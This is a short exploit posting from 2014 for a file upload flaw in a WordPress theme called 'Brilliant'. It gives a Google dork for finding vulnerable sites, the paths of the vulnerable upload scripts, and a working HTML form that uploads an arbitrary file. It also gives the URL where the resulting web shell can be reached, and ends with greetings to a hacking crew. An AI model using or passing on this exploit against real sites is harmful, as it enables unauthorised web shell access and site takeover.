Author: AnonBoy | , Published: 29-04-2014 |
############################################################################
# Title : Wordpress Brilliant Themes CSRF File Upload Vulnerability
# Author : AnonBoy
# Date : 29/04/2014
# Facebook => https://www.facebook.com/nufailienafratsim.moechtar
# Vandor : N/a
# Google Dork => inurl:/wp-content/themes/brilliant
# Tested on : Windows 7
############################################################################
exploit : /theme/functions/upload-bg.php
/theme/functions/uploadbg.php
/theme/functions/upload.php
<form enctype="multipart/form-data"
action="http://www.target.com/wp-content/themes/brilliant/theme/functions/upload.php" method="post">
<input type="jpg" name="url" value="./" />
Please choose a file: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>
shell path will post
Shell Akses ===> http://www.target.com/wp-content/themes/brilliant/theme/functions/{random_name_shell.php}
--------------------------------------------------------------------------------------
[#] Greeting ############################################################################################################################ #
./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan ./Gantengers Crew
AND BIG FAMILY OF ACEH CYBER TEAM
##########################################################################################################################################
Like us on Facebook :